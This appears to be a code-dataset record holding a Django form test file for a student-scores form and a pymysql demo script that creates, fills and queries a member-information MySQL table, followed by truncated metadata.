'chemistryScore': [\n 'Ensure this value is less than or equal to 100.'],\n 'biologyScore': [\n 'Ensure this value is less than or equal to 100.']})\n",
"step-4": "from django.test import TestCase\nfrom student.forms import StudentForm\n\n\nclass ModelTest(TestCase):\n\n def test_expense_form_valid_data(self):\n form = StudentForm(data={'student_id': 500, 'firstName': 'Emre',\n 'lastName': 'Tan', 'department': 'Panama', 'mathScore': 100,\n 'physicsScore': 70, 'chemistryScore': 40, 'biologyScore': 10})\n self.assertTrue(form.is_valid())\n\n def test_expense_form_no_data(self):\n form = StudentForm(data={})\n self.assertFalse(form.is_valid())\n self.assertEqual(len(form.errors), 8)\n\n def test_expense_form_invalid_required(self):\n form = StudentForm(data={'student_id': 500, 'firstName': '',\n 'lastName': '', 'department': '', 'mathScore': 100,\n 'physicsScore': 70, 'chemistryScore': 40, 'biologyScore': 10})\n self.assertFalse(form.is_valid())\n self.assertEqual(len(form.errors), 3)\n self.assertEqual(form.errors, {'firstName': [\n 'This field is required.'], 'lastName': [\n 'This field is required.'], 'department': [\n 'This field is required.']})\n\n def test_expense_form_invalid_equal_to_max(self):\n form = StudentForm(data={'student_id': 120000, 'firstName':\n 'Berkay', 'lastName': 'Tan', 'department': 'Bilisim',\n 'mathScore': 200, 'physicsScore': 150, 'chemistryScore': 150,\n 'biologyScore': 101})\n self.assertFalse(form.is_valid())\n self.assertEqual(len(form.errors), 5)\n self.assertEqual(form.errors, {'student_id': [\n 'Ensure this value is less than or equal to 9999.'],\n 'mathScore': ['Ensure this value is less than or equal to 100.'\n ], 'physicsScore': [\n 'Ensure this value is less than or equal to 100.'],\n 'chemistryScore': [\n 'Ensure this value is less than or equal to 100.'],\n 'biologyScore': [\n 'Ensure this value is less than or equal to 100.']})\n",
"step-5": "from django.test import TestCase\nfrom student.forms import StudentForm\n\n\nclass ModelTest(TestCase):\n\n def test_expense_form_valid_data(self):\n form = StudentForm(data={\n 'student_id': 500,\n 'firstName': \"Emre\",\n 'lastName': \"Tan\",\n 'department': \"Panama\",\n 'mathScore': 100,\n 'physicsScore': 70,\n 'chemistryScore': 40,\n 'biologyScore': 10\n })\n\n self.assertTrue(form.is_valid())\n\n def test_expense_form_no_data(self):\n form = StudentForm(data={})\n\n self.assertFalse(form.is_valid())\n self.assertEqual(len(form.errors), 8)\n\n def test_expense_form_invalid_required(self):\n form = StudentForm(data={\n 'student_id': 500,\n 'firstName': \"\",\n 'lastName': \"\",\n 'department': \"\",\n 'mathScore': 100,\n 'physicsScore': 70,\n 'chemistryScore': 40,\n 'biologyScore': 10\n })\n self.assertFalse(form.is_valid())\n self.assertEqual(len(form.errors), 3)\n self.assertEqual(form.errors, {\n 'firstName': ['This field is required.'],\n 'lastName': ['This field is required.'],\n 'department': ['This field is required.']\n })\n\n def test_expense_form_invalid_equal_to_max(self):\n form = StudentForm(data={\n 'student_id': 120000,\n 'firstName': \"Berkay\",\n 'lastName': \"Tan\",\n 'department': \"Bilisim\",\n 'mathScore': 200,\n 'physicsScore': 150,\n 'chemistryScore': 150,\n 'biologyScore': 101\n })\n self.assertFalse(form.is_valid())\n self.assertEqual(len(form.errors), 5)\n self.assertEqual(form.errors, {\n 'student_id': ['Ensure this value is less than or equal to 9999.'],\n 'mathScore': ['Ensure this value is less than or equal to 100.'],\n 'physicsScore': ['Ensure this value is less than or equal to 100.'],\n 'chemistryScore': ['Ensure this value is less than or equal to 100.'],\n 'biologyScore': ['Ensure this value is less than or equal to 100.'],\n })\n",
"step-ids": [
3,
4,
5,
6,
7
]
}
|
[
3,
4,
5,
6,
7
] |
import pymysql
def testeSelect(db):
#创建查询游标
cur1 = db.cursor()
# 使用 execute() 方法执行 SQL 查询
cur1.execute("SELECT VERSION()")
# 使用 fetchone() 方法获取单条数据.
data = cur1.fetchone()
print(dir(data))
print ("cur1 : %s " % cur1)
print ("Database version : %s " % data)
def dropTable(db):
#创建查询游标
cur1 = db.cursor()
cur1.execute("drop table if exists python_demo")
print('dropTable',cur1)
def createTable(db):
#创建查询游标
cur1 = db.cursor()
sql = '''
CREATE TABLE IF NOT EXISTS python_demo (
MEMBER_ID INT(20) NOT NULL AUTO_INCREMENT COMMENT '会员ID',
MEMBER_CODE VARCHAR(20) NOT NULL COMMENT '会员代码',
MEMBER_NAME VARCHAR(128) NOT NULL COMMENT '公司中文名称',
MEMBER_NAME_SHORT VARCHAR(128) NULL DEFAULT NULL COMMENT '公司简称',
COMPANY_NAME_EN VARCHAR(128) NULL DEFAULT NULL COMMENT '公司英文名称',
REG_PLACE VARCHAR(20) NULL DEFAULT NULL COMMENT '公司注册地址',
REG_ADDRESS VARCHAR(128) NULL DEFAULT NULL COMMENT '公司注册地址',
ENT_TYPE VARCHAR(20) NULL DEFAULT NULL COMMENT '公司性质',
REGCAPITAL DOUBLE(12,2) NULL DEFAULT NULL COMMENT '注册资本',
REG_CURRENCY VARCHAR(20) NULL DEFAULT NULL COMMENT '注册资本币种',
JUDICIAL_PERSON VARCHAR(32) NULL DEFAULT NULL COMMENT '法人名称',
BUSINESS_SCOPE VARCHAR(128) NULL DEFAULT NULL COMMENT '公司经营范围',
COM_TEL VARCHAR(20) NULL DEFAULT NULL COMMENT '公司电话',
COM_FAX VARCHAR(64) NULL DEFAULT NULL COMMENT '公司传真',
PERSON_INCHARGE VARCHAR(64) NULL DEFAULT NULL COMMENT '公司负责人',
ZIP_CODE VARCHAR(6) NULL DEFAULT NULL COMMENT '邮编',
CON_NAME VARCHAR(32) NULL DEFAULT NULL COMMENT '联系人姓名',
CON_MOBILE VARCHAR(20) NULL DEFAULT NULL COMMENT '联系人手机',
CON_EMAIL VARCHAR(32) NULL DEFAULT NULL COMMENT '联系人邮箱',
CON_FAX VARCHAR(32) NULL DEFAULT NULL COMMENT '联系人传真',
CON_CERT_TYPE VARCHAR(20) NULL DEFAULT NULL COMMENT '联系人证件类型',
CON_CERT_NO VARCHAR(20) NULL DEFAULT NULL COMMENT '联系人证件号',
CON_CERT_DATE DATE NULL DEFAULT NULL COMMENT '联系人证件失效时间',
CON_CER1_ID INT(20) NULL DEFAULT NULL COMMENT '联系人身份证正面ID',
CON_CER2_ID INT(20) NULL DEFAULT NULL COMMENT '联系人身份证反面ID',
THERECER_INTGRATED VARCHAR(20) NULL DEFAULT NULL COMMENT '三证合一标志',
BIZLIC_ID INT(20) NULL DEFAULT NULL COMMENT '营业执照ID',
BIZLIC_NO VARCHAR(20) NULL DEFAULT NULL COMMENT '营业执照代码',
BIZLIC_DATE DATE NULL DEFAULT NULL COMMENT '营业执照失效时间',
TAXREGISTER_ID INT(20) NULL DEFAULT NULL COMMENT '税务等级证书ID',
TAXREGISTER_NO VARCHAR(20) NULL DEFAULT NULL COMMENT '税务登记号',
TAXREGISTER_DATE DATE NULL DEFAULT NULL COMMENT '税务登记失效时间',
ORGREG_ID INT(20) NULL DEFAULT NULL COMMENT '组织机构代码证ID',
ORGREG_NO VARCHAR(20) NULL DEFAULT NULL COMMENT '组织机构代码',
ORGREG_DATE DATE NULL DEFAULT NULL COMMENT '组织机构失效时间',
BANK_ID INT(20) NULL DEFAULT NULL COMMENT '银行开户许可证ID',
BANK_TYPE VARCHAR(20) NULL DEFAULT NULL COMMENT '开户银行类别',
BANK_DEPOSIT VARCHAR(128) NULL DEFAULT NULL COMMENT '开户银行',
BANK_DEPOSIT_CODE VARCHAR(32) NULL DEFAULT NULL COMMENT '开户银行编码',
BANK_ACCOUNTNO VARCHAR(32) NULL DEFAULT NULL COMMENT '银行账号',
BANK_HOUSEHOULD VARCHAR(32) NULL DEFAULT NULL COMMENT '银行户主',
INVOICE_TITLE VARCHAR(128) NULL DEFAULT NULL COMMENT '开票台头',
INVOICE_ADDRESS VARCHAR(20) NULL DEFAULT NULL COMMENT '开票地址',
INVOICE_ADDRESS_DT VARCHAR(128) NULL DEFAULT NULL COMMENT '开票详细地址',
APPLY_SELLER_ID INT(20) NULL DEFAULT NULL COMMENT '申请审核机构',
BUYER_FLAG VARCHAR(20) NULL DEFAULT NULL COMMENT '买家标识',
SELLER_FLAG VARCHAR(20) NULL DEFAULT NULL COMMENT '卖家标识',
THIRD_PART_FLAG VARCHAR(20) NULL DEFAULT NULL COMMENT '第三方标识',
MAIN_USER_ID INT(20) NULL DEFAULT NULL COMMENT '主账号ID',
MDM_DATA_CODE VARCHAR(20) NULL DEFAULT NULL COMMENT 'MDM主数据CODE',
ERP_DATA_CODE VARCHAR(20) NULL DEFAULT NULL COMMENT 'ERP会员CODE',
REG_TYPE VARCHAR(20) NULL DEFAULT NULL COMMENT '注册类型',
STATUS VARCHAR(20) NULL DEFAULT NULL COMMENT '会员状态',
AUDITOR VARCHAR(128) NULL DEFAULT NULL COMMENT '审核人',
AUDIT_DATE DATETIME NULL DEFAULT NULL COMMENT '审核时间',
AUDIT_RESULT VARCHAR(20) NULL DEFAULT NULL COMMENT '审核结果',
AUDIT_OPINION VARCHAR(128) NULL DEFAULT NULL COMMENT '审核意见',
MDM_AUDITOR VARCHAR(32) NULL DEFAULT NULL COMMENT 'MDM审核人',
MDM_AUDIT_DATE DATETIME NULL DEFAULT NULL COMMENT 'MDM审核时间',
MDM_AUDIT_OPINION VARCHAR(128) NULL DEFAULT NULL COMMENT 'MDM审核意见',
MDM_AUDIT_RESULT VARCHAR(20) NULL DEFAULT NULL COMMENT 'MDM审核结果',
MEMBER_CHG_ID INT(20) NULL DEFAULT NULL COMMENT '变更ID',
CHANGE_STATUS VARCHAR(20) NULL DEFAULT NULL COMMENT '变更状态',
ALIVE_FLAG VARCHAR(1) NOT NULL COMMENT '当前有效状态',
LANG_VER VARCHAR(10) NULL DEFAULT NULL COMMENT '语言类型',
CREATE_USER INT(20) NOT NULL COMMENT '创建者',
CREATE_DATE DATETIME NOT NULL COMMENT '创建时间',
UPDATE_USER INT(20) NULL DEFAULT NULL COMMENT '修改者',
UPDATE_DATE DATETIME NULL DEFAULT NULL COMMENT '修改时间',
DELETE_USER INT(20) NULL DEFAULT NULL COMMENT '删除者',
DELETE_DATE DATETIME NULL DEFAULT NULL COMMENT '删除时间',
BUYER_TYPE VARCHAR(20) NULL DEFAULT NULL COMMENT '买家类型(01:个人买家;02:公司买家)',
AUDIT_OPTION_FLAG VARCHAR(20) NULL DEFAULT NULL COMMENT '审核身份标识(01:平台;02:卖家)',
AUDIT_SELLER_ID INT(20) NULL DEFAULT NULL COMMENT '审核卖家ID(当审核身份标识为卖家审核时,审核的卖家ID)',
SELLER_MDM VARCHAR(20) NULL DEFAULT NULL COMMENT '卖家MDM系统',
SELLER_SAP VARCHAR(20) NULL DEFAULT NULL COMMENT '卖家SAP系统',
SELLER_MDM_DATA_CODE VARCHAR(20) NULL DEFAULT NULL COMMENT '卖家MDM系统数据CODE',
IS_PLAT_BLACK VARCHAR(2) NULL DEFAULT NULL COMMENT '黑名单状态(41:是;0:否)',
INVOCIE_ADDRESS_LEFT3 VARCHAR(10) NULL DEFAULT NULL COMMENT '用户所属区域-省',
INVOCIE_ADDRESS_RIGHT5 VARCHAR(10) NULL DEFAULT NULL COMMENT '用户所属区域-市',
PRIMARY KEY (MEMBER_ID)
)
COMMENT='会员信息表'
COLLATE='utf8_general_ci'
ENGINE=InnoDB
'''
cur1.execute(sql)
print('createTabl',cur1)
def selectTable(db):
#创建查询游标
cur1 = db.cursor()
cur1.execute("select member_name,MEMBER_CODE,member_id from python_demo limit 10")
# 使用 fetchall() 接收全部的返回结果行
data = cur1.fetchall()
for index,item in enumerate(data):
print(index,sep=' ', end=' ')
for index2,item2 in enumerate(item):
print(item2,sep=' ', end=' ')
print("")
def insertTable(db):
#创建查询游标
cur1 = db.cursor()
cur1.execute("INSERT INTO python_demo (MEMBER_CODE, MEMBER_NAME, MEMBER_NAME_SHORT, COMPANY_NAME_EN, REG_PLACE, REG_ADDRESS, ENT_TYPE, REGCAPITAL, REG_CURRENCY, JUDICIAL_PERSON, BUSINESS_SCOPE, COM_TEL, COM_FAX, PERSON_INCHARGE, ZIP_CODE, CON_NAME, CON_MOBILE, CON_EMAIL, CON_FAX, CON_CERT_TYPE, CON_CERT_NO, CON_CERT_DATE, CON_CER1_ID, CON_CER2_ID, THERECER_INTGRATED, BIZLIC_ID, BIZLIC_NO, BIZLIC_DATE, TAXREGISTER_ID, TAXREGISTER_NO, TAXREGISTER_DATE, ORGREG_ID, ORGREG_NO, ORGREG_DATE, BANK_ID, BANK_TYPE, BANK_DEPOSIT, BANK_DEPOSIT_CODE, BANK_ACCOUNTNO, BANK_HOUSEHOULD, INVOICE_TITLE, INVOICE_ADDRESS, INVOICE_ADDRESS_DT, APPLY_SELLER_ID, BUYER_FLAG, SELLER_FLAG, THIRD_PART_FLAG, MAIN_USER_ID, MDM_DATA_CODE, ERP_DATA_CODE, REG_TYPE, STATUS, AUDITOR, AUDIT_DATE, AUDIT_RESULT, AUDIT_OPINION, MDM_AUDITOR, MDM_AUDIT_DATE, MDM_AUDIT_OPINION, MDM_AUDIT_RESULT, MEMBER_CHG_ID, CHANGE_STATUS, ALIVE_FLAG, LANG_VER, CREATE_USER, CREATE_DATE, UPDATE_USER, UPDATE_DATE, DELETE_USER, DELETE_DATE, BUYER_TYPE, AUDIT_OPTION_FLAG, AUDIT_SELLER_ID, SELLER_MDM, SELLER_SAP, SELLER_MDM_DATA_CODE, IS_PLAT_BLACK, INVOCIE_ADDRESS_LEFT3, INVOCIE_ADDRESS_RIGHT5) VALUES ('A000001', '中国有限公司', '中国有限公司', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 'xinming', '15136378930', NULL, NULL, NULL, NULL, NULL, NULL, NULL, '0', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, '0', '1', '0', 2, 'M0000001', '00M0000001', '10', '01', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 2, '01', '1', 'ZH-CN', 179143, '2016-05-28 12:16:23', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL)")
# 使用 fetchall() 接收全部的返回结果行
#data = cur1.rowcount()
#print('insertTable',data)
# 打开数据库连接
db = pymysql.connect(host='127.0.0.1',user='pu3147',
password='1qaz@WSX',database='demo',port=3306,charset='UTF8')
dropTable(db)
createTable(db)
insertTable(db)
insertTable(db)
insertTable(db)
insertTable(db)
insertTable(db)
testeSelect(db)
selectTable(db)
# 关闭数据库连接
db.close()
|
normal
|
{
"blob_id": "75133dd924f8f3f028075c5d2109bb79ddc7fe87",
"index": 434,
"step-1": "<mask token>\n\n\ndef testeSelect(db):\n cur1 = db.cursor()\n cur1.execute('SELECT VERSION()')\n data = cur1.fetchone()\n print(dir(data))\n print('cur1 : %s ' % cur1)\n print('Database version : %s ' % data)\n\n\ndef dropTable(db):\n cur1 = db.cursor()\n cur1.execute('drop table if exists python_demo')\n print('dropTable', cur1)\n\n\ndef createTable(db):\n cur1 = db.cursor()\n sql = \"\"\"\n\t\t\tCREATE TABLE IF NOT EXISTS python_demo (\n\t\t\t\tMEMBER_ID INT(20) NOT NULL AUTO_INCREMENT COMMENT '会员ID',\n\t\t\t\tMEMBER_CODE VARCHAR(20) NOT NULL COMMENT '会员代码',\n\t\t\t\tMEMBER_NAME VARCHAR(128) NOT NULL COMMENT '公司中文名称',\n\t\t\t\tMEMBER_NAME_SHORT VARCHAR(128) NULL DEFAULT NULL COMMENT '公司简称',\n\t\t\t\tCOMPANY_NAME_EN VARCHAR(128) NULL DEFAULT NULL COMMENT '公司英文名称',\n\t\t\t\tREG_PLACE VARCHAR(20) NULL DEFAULT NULL COMMENT '公司注册地址',\n\t\t\t\tREG_ADDRESS VARCHAR(128) NULL DEFAULT NULL COMMENT '公司注册地址',\n\t\t\t\tENT_TYPE VARCHAR(20) NULL DEFAULT NULL COMMENT '公司性质',\n\t\t\t\tREGCAPITAL DOUBLE(12,2) NULL DEFAULT NULL COMMENT '注册资本',\n\t\t\t\tREG_CURRENCY VARCHAR(20) NULL DEFAULT NULL COMMENT '注册资本币种',\n\t\t\t\tJUDICIAL_PERSON VARCHAR(32) NULL DEFAULT NULL COMMENT '法人名称',\n\t\t\t\tBUSINESS_SCOPE VARCHAR(128) NULL DEFAULT NULL COMMENT '公司经营范围',\n\t\t\t\tCOM_TEL VARCHAR(20) NULL DEFAULT NULL COMMENT '公司电话',\n\t\t\t\tCOM_FAX VARCHAR(64) NULL DEFAULT NULL COMMENT '公司传真',\n\t\t\t\tPERSON_INCHARGE VARCHAR(64) NULL DEFAULT NULL COMMENT '公司负责人',\n\t\t\t\tZIP_CODE VARCHAR(6) NULL DEFAULT NULL COMMENT '邮编',\n\t\t\t\tCON_NAME VARCHAR(32) NULL DEFAULT NULL COMMENT '联系人姓名',\n\t\t\t\tCON_MOBILE VARCHAR(20) NULL DEFAULT NULL COMMENT '联系人手机',\n\t\t\t\tCON_EMAIL VARCHAR(32) NULL DEFAULT NULL COMMENT '联系人邮箱',\n\t\t\t\tCON_FAX VARCHAR(32) NULL DEFAULT NULL COMMENT '联系人传真',\n\t\t\t\tCON_CERT_TYPE VARCHAR(20) NULL DEFAULT NULL COMMENT '联系人证件类型',\n\t\t\t\tCON_CERT_NO VARCHAR(20) NULL DEFAULT NULL COMMENT '联系人证件号',\n\t\t\t\tCON_CERT_DATE DATE NULL DEFAULT NULL COMMENT '联系人证件失效时间',\n\t\t\t\tCON_CER1_ID INT(20) NULL DEFAULT NULL COMMENT '联系人身份证正面ID',\n\t\t\t\tCON_CER2_ID INT(20) NULL DEFAULT NULL COMMENT '联系人身份证反面ID',\n\t\t\t\tTHERECER_INTGRATED VARCHAR(20) NULL DEFAULT NULL COMMENT '三证合一标志',\n\t\t\t\tBIZLIC_ID INT(20) NULL DEFAULT NULL COMMENT '营业执照ID',\n\t\t\t\tBIZLIC_NO VARCHAR(20) NULL DEFAULT NULL COMMENT '营业执照代码',\n\t\t\t\tBIZLIC_DATE DATE NULL DEFAULT NULL COMMENT '营业执照失效时间',\n\t\t\t\tTAXREGISTER_ID INT(20) NULL DEFAULT NULL COMMENT '税务等级证书ID',\n\t\t\t\tTAXREGISTER_NO VARCHAR(20) NULL DEFAULT NULL COMMENT '税务登记号',\n\t\t\t\tTAXREGISTER_DATE DATE NULL DEFAULT NULL COMMENT '税务登记失效时间',\n\t\t\t\tORGREG_ID INT(20) NULL DEFAULT NULL COMMENT '组织机构代码证ID',\n\t\t\t\tORGREG_NO VARCHAR(20) NULL DEFAULT NULL COMMENT '组织机构代码',\n\t\t\t\tORGREG_DATE DATE NULL DEFAULT NULL COMMENT '组织机构失效时间',\n\t\t\t\tBANK_ID INT(20) NULL DEFAULT NULL COMMENT '银行开户许可证ID',\n\t\t\t\tBANK_TYPE VARCHAR(20) NULL DEFAULT NULL COMMENT '开户银行类别',\n\t\t\t\tBANK_DEPOSIT VARCHAR(128) NULL DEFAULT NULL COMMENT '开户银行',\n\t\t\t\tBANK_DEPOSIT_CODE VARCHAR(32) NULL DEFAULT NULL COMMENT '开户银行编码',\n\t\t\t\tBANK_ACCOUNTNO VARCHAR(32) NULL DEFAULT NULL COMMENT '银行账号',\n\t\t\t\tBANK_HOUSEHOULD VARCHAR(32) NULL DEFAULT NULL COMMENT '银行户主',\n\t\t\t\tINVOICE_TITLE VARCHAR(128) NULL DEFAULT NULL COMMENT '开票台头',\n\t\t\t\tINVOICE_ADDRESS VARCHAR(20) NULL DEFAULT NULL COMMENT '开票地址',\n\t\t\t\tINVOICE_ADDRESS_DT VARCHAR(128) NULL DEFAULT NULL COMMENT '开票详细地址',\n\t\t\t\tAPPLY_SELLER_ID INT(20) NULL DEFAULT NULL COMMENT '申请审核机构',\n\t\t\t\tBUYER_FLAG VARCHAR(20) NULL DEFAULT NULL COMMENT '买家标识',\n\t\t\t\tSELLER_FLAG VARCHAR(20) NULL DEFAULT NULL COMMENT '卖家标识',\n\t\t\t\tTHIRD_PART_FLAG VARCHAR(20) NULL DEFAULT NULL COMMENT '第三方标识',\n\t\t\t\tMAIN_USER_ID INT(20) NULL DEFAULT NULL COMMENT '主账号ID',\n\t\t\t\tMDM_DATA_CODE VARCHAR(20) NULL DEFAULT NULL COMMENT 'MDM主数据CODE',\n\t\t\t\tERP_DATA_CODE VARCHAR(20) NULL DEFAULT NULL COMMENT 'ERP会员CODE',\n\t\t\t\tREG_TYPE VARCHAR(20) NULL DEFAULT NULL COMMENT '注册类型',\n\t\t\t\tSTATUS VARCHAR(20) NULL DEFAULT NULL COMMENT '会员状态',\n\t\t\t\tAUDITOR VARCHAR(128) NULL DEFAULT NULL COMMENT '审核人',\n\t\t\t\tAUDIT_DATE DATETIME NULL DEFAULT NULL COMMENT '审核时间',\n\t\t\t\tAUDIT_RESULT VARCHAR(20) NULL DEFAULT NULL COMMENT '审核结果',\n\t\t\t\tAUDIT_OPINION VARCHAR(128) NULL DEFAULT NULL COMMENT '审核意见',\n\t\t\t\tMDM_AUDITOR VARCHAR(32) NULL DEFAULT NULL COMMENT 'MDM审核人',\n\t\t\t\tMDM_AUDIT_DATE DATETIME NULL DEFAULT NULL COMMENT 'MDM审核时间',\n\t\t\t\tMDM_AUDIT_OPINION VARCHAR(128) NULL DEFAULT NULL COMMENT 'MDM审核意见',\n\t\t\t\tMDM_AUDIT_RESULT VARCHAR(20) NULL DEFAULT NULL COMMENT 'MDM审核结果',\n\t\t\t\tMEMBER_CHG_ID INT(20) NULL DEFAULT NULL COMMENT '变更ID',\n\t\t\t\tCHANGE_STATUS VARCHAR(20) NULL DEFAULT NULL COMMENT '变更状态',\n\t\t\t\tALIVE_FLAG VARCHAR(1) NOT NULL COMMENT '当前有效状态',\n\t\t\t\tLANG_VER VARCHAR(10) NULL DEFAULT NULL COMMENT '语言类型',\n\t\t\t\tCREATE_USER INT(20) NOT NULL COMMENT '创建者',\n\t\t\t\tCREATE_DATE DATETIME NOT NULL COMMENT '创建时间',\n\t\t\t\tUPDATE_USER INT(20) NULL DEFAULT NULL COMMENT '修改者',\n\t\t\t\tUPDATE_DATE DATETIME NULL DEFAULT NULL COMMENT '修改时间',\n\t\t\t\tDELETE_USER INT(20) NULL DEFAULT NULL COMMENT '删除者',\n\t\t\t\tDELETE_DATE DATETIME NULL DEFAULT NULL COMMENT '删除时间',\n\t\t\t\tBUYER_TYPE VARCHAR(20) NULL DEFAULT NULL COMMENT '买家类型(01:个人买家;02:公司买家)',\n\t\t\t\tAUDIT_OPTION_FLAG VARCHAR(20) NULL DEFAULT NULL COMMENT '审核身份标识(01:平台;02:卖家)',\n\t\t\t\tAUDIT_SELLER_ID INT(20) NULL DEFAULT NULL COMMENT '审核卖家ID(当审核身份标识为卖家审核时,审核的卖家ID)',\n\t\t\t\tSELLER_MDM VARCHAR(20) NULL DEFAULT NULL COMMENT '卖家MDM系统',\n\t\t\t\tSELLER_SAP VARCHAR(20) NULL DEFAULT NULL COMMENT '卖家SAP系统',\n\t\t\t\tSELLER_MDM_DATA_CODE VARCHAR(20) NULL DEFAULT NULL COMMENT '卖家MDM系统数据CODE',\n\t\t\t\tIS_PLAT_BLACK VARCHAR(2) NULL DEFAULT NULL COMMENT '黑名单状态(41:是;0:否)',\n\t\t\t\tINVOCIE_ADDRESS_LEFT3 VARCHAR(10) NULL DEFAULT NULL COMMENT '用户所属区域-省',\n\t\t\t\tINVOCIE_ADDRESS_RIGHT5 VARCHAR(10) NULL DEFAULT NULL COMMENT '用户所属区域-市',\n\t\t\t\tPRIMARY KEY (MEMBER_ID)\n\t\t\t)\n\t\t\tCOMMENT='会员信息表'\n\t\t\tCOLLATE='utf8_general_ci'\n\t\t\tENGINE=InnoDB\n\t\"\"\"\n cur1.execute(sql)\n print('createTabl', cur1)\n\n\n<mask token>\n\n\ndef insertTable(db):\n cur1 = db.cursor()\n cur1.execute(\n \"INSERT INTO python_demo (MEMBER_CODE, MEMBER_NAME, MEMBER_NAME_SHORT, COMPANY_NAME_EN, REG_PLACE, REG_ADDRESS, ENT_TYPE, REGCAPITAL, REG_CURRENCY, JUDICIAL_PERSON, BUSINESS_SCOPE, COM_TEL, COM_FAX, PERSON_INCHARGE, ZIP_CODE, CON_NAME, CON_MOBILE, CON_EMAIL, CON_FAX, CON_CERT_TYPE, CON_CERT_NO, CON_CERT_DATE, CON_CER1_ID, CON_CER2_ID, THERECER_INTGRATED, BIZLIC_ID, BIZLIC_NO, BIZLIC_DATE, TAXREGISTER_ID, TAXREGISTER_NO, TAXREGISTER_DATE, ORGREG_ID, ORGREG_NO, ORGREG_DATE, BANK_ID, BANK_TYPE, BANK_DEPOSIT, BANK_DEPOSIT_CODE, BANK_ACCOUNTNO, BANK_HOUSEHOULD, INVOICE_TITLE, INVOICE_ADDRESS, INVOICE_ADDRESS_DT, APPLY_SELLER_ID, BUYER_FLAG, SELLER_FLAG, THIRD_PART_FLAG, MAIN_USER_ID, MDM_DATA_CODE, ERP_DATA_CODE, REG_TYPE, STATUS, AUDITOR, AUDIT_DATE, AUDIT_RESULT, AUDIT_OPINION, MDM_AUDITOR, MDM_AUDIT_DATE, MDM_AUDIT_OPINION, MDM_AUDIT_RESULT, MEMBER_CHG_ID, CHANGE_STATUS, ALIVE_FLAG, LANG_VER, CREATE_USER, CREATE_DATE, UPDATE_USER, UPDATE_DATE, DELETE_USER, DELETE_DATE, BUYER_TYPE, AUDIT_OPTION_FLAG, AUDIT_SELLER_ID, SELLER_MDM, SELLER_SAP, SELLER_MDM_DATA_CODE, IS_PLAT_BLACK, INVOCIE_ADDRESS_LEFT3, INVOCIE_ADDRESS_RIGHT5) VALUES ('A000001', '中国有限公司', '中国有限公司', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 'xinming', '15136378930', NULL, NULL, NULL, NULL, NULL, NULL, NULL, '0', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, '0', '1', '0', 2, 'M0000001', '00M0000001', '10', '01', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 2, '01', '1', 'ZH-CN', 179143, '2016-05-28 12:16:23', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL)\"\n )\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\ndef testeSelect(db):\n cur1 = db.cursor()\n cur1.execute('SELECT VERSION()')\n data = cur1.fetchone()\n print(dir(data))\n print('cur1 : %s ' % cur1)\n print('Database version : %s ' % data)\n\n\ndef dropTable(db):\n cur1 = db.cursor()\n cur1.execute('drop table if exists python_demo')\n print('dropTable', cur1)\n\n\ndef createTable(db):\n cur1 = db.cursor()\n sql = \"\"\"\n\t\t\tCREATE TABLE IF NOT EXISTS python_demo (\n\t\t\t\tMEMBER_ID INT(20) NOT NULL AUTO_INCREMENT COMMENT '会员ID',\n\t\t\t\tMEMBER_CODE VARCHAR(20) NOT NULL COMMENT '会员代码',\n\t\t\t\tMEMBER_NAME VARCHAR(128) NOT NULL COMMENT '公司中文名称',\n\t\t\t\tMEMBER_NAME_SHORT VARCHAR(128) NULL DEFAULT NULL COMMENT '公司简称',\n\t\t\t\tCOMPANY_NAME_EN VARCHAR(128) NULL DEFAULT NULL COMMENT '公司英文名称',\n\t\t\t\tREG_PLACE VARCHAR(20) NULL DEFAULT NULL COMMENT '公司注册地址',\n\t\t\t\tREG_ADDRESS VARCHAR(128) NULL DEFAULT NULL COMMENT '公司注册地址',\n\t\t\t\tENT_TYPE VARCHAR(20) NULL DEFAULT NULL COMMENT '公司性质',\n\t\t\t\tREGCAPITAL DOUBLE(12,2) NULL DEFAULT NULL COMMENT '注册资本',\n\t\t\t\tREG_CURRENCY VARCHAR(20) NULL DEFAULT NULL COMMENT '注册资本币种',\n\t\t\t\tJUDICIAL_PERSON VARCHAR(32) NULL DEFAULT NULL COMMENT '法人名称',\n\t\t\t\tBUSINESS_SCOPE VARCHAR(128) NULL DEFAULT NULL COMMENT '公司经营范围',\n\t\t\t\tCOM_TEL VARCHAR(20) NULL DEFAULT NULL COMMENT '公司电话',\n\t\t\t\tCOM_FAX VARCHAR(64) NULL DEFAULT NULL COMMENT '公司传真',\n\t\t\t\tPERSON_INCHARGE VARCHAR(64) NULL DEFAULT NULL COMMENT '公司负责人',\n\t\t\t\tZIP_CODE VARCHAR(6) NULL DEFAULT NULL COMMENT '邮编',\n\t\t\t\tCON_NAME VARCHAR(32) NULL DEFAULT NULL COMMENT '联系人姓名',\n\t\t\t\tCON_MOBILE VARCHAR(20) NULL DEFAULT NULL COMMENT '联系人手机',\n\t\t\t\tCON_EMAIL VARCHAR(32) NULL DEFAULT NULL COMMENT '联系人邮箱',\n\t\t\t\tCON_FAX VARCHAR(32) NULL DEFAULT NULL COMMENT '联系人传真',\n\t\t\t\tCON_CERT_TYPE VARCHAR(20) NULL DEFAULT NULL COMMENT '联系人证件类型',\n\t\t\t\tCON_CERT_NO VARCHAR(20) NULL DEFAULT NULL COMMENT '联系人证件号',\n\t\t\t\tCON_CERT_DATE DATE NULL DEFAULT NULL COMMENT '联系人证件失效时间',\n\t\t\t\tCON_CER1_ID INT(20) NULL DEFAULT NULL COMMENT '联系人身份证正面ID',\n\t\t\t\tCON_CER2_ID INT(20) NULL DEFAULT NULL COMMENT '联系人身份证反面ID',\n\t\t\t\tTHERECER_INTGRATED VARCHAR(20) NULL DEFAULT NULL COMMENT '三证合一标志',\n\t\t\t\tBIZLIC_ID INT(20) NULL DEFAULT NULL COMMENT '营业执照ID',\n\t\t\t\tBIZLIC_NO VARCHAR(20) NULL DEFAULT NULL COMMENT 